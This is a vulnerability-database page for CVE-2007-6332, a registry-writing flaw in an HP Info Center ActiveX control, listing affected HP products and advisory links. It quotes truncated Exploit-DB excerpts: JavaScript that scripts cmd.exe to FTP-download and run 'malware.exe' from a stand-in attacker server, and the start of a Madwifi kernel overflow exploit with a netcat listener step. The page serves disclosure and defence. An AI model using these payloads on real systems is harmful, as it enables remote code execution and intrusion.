CVE-2007-6332
published 2007-12-13
Priority P347 · critical · 9.3 CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 8.43% (94.3th percentile)
The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | info_center | — | — |
| hp | quick_launch_button | <= 6.3 | — |
No detection rules found.
Exploit-DB
HP Compaq Notebooks - ActiveX Remote Code Execution
exploitdb·2007-12-11
CVE-2007-6333 HP Compaq Notebooks - ActiveX Remote Code Execution
---
var attackersFtpServerAddress="attacker.ftp.server";
var attackersFtpUname="IDidntDoAnything";
var attackersFtpPassword="password";
var executableFileName="malware.exe";
var cnt,p;
function spawn2()
{
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C echo open "+attackersFtpServerAddress+
" >> c:\\ftpd&echo "+attackersFtpUname+">> c:\\ftpd&echo "+attackersFtpPassword+
">> c:\\ftpd&echo binary>> c:\\ftpd&echo get "+executableFileName+
"c:\\"+executableFileName+" >> c:\\ftpd&echo quit>> c:\\ftpd",0);
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C echo cd c:\\>> c:\\ftpd.bat"+
"&echo ftp -s:ftpd>> c:\\ftpd.bat&echo start c:\\"+executableFileName+
" >> c:\\ftpd.bat",0);
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C c:\
Exploit-DB
Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow
exploitdb·2007-03-01
CVE-2006-6332 Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow
---
/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------
* exploit code by: sgrakkyu antifork.org -- 10/1/2007
*
* CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)
*
* (for wpa)
* ....
* memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2)
* ....
* ....
* the function re-uses args in the stack before returning so we
* can't trash them overwriting.
* Different compiled module [ex. different version of gcc] may require
* a different pad value.. (see -g option)
*
* ex:
* on one terminal runs: nc -l -p 31337
* phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon
* phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
* phi:~/kexec/lorcon# ifconfig ath1 up
* phi:~/kexec/lorcon# ./ma
No writeups or analysis indexed.
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01300486
http://secunia.com/advisories/28055
http://securitytracker.com/id?1019086
http://www.anspi.pl/~porkythepig/hp-issue/kilokieubasy.txt
http://www.securityfocus.com/archive/1/484880/100/100/threaded
http://www.securityfocus.com/bid/26823
http://www.vupen.com/english/advisories/2007/4192
https://exchange.xforce.ibmcloud.com/vulnerabilities/38994
https://www.exploit-db.com/exploits/4720
2007-12-13
Published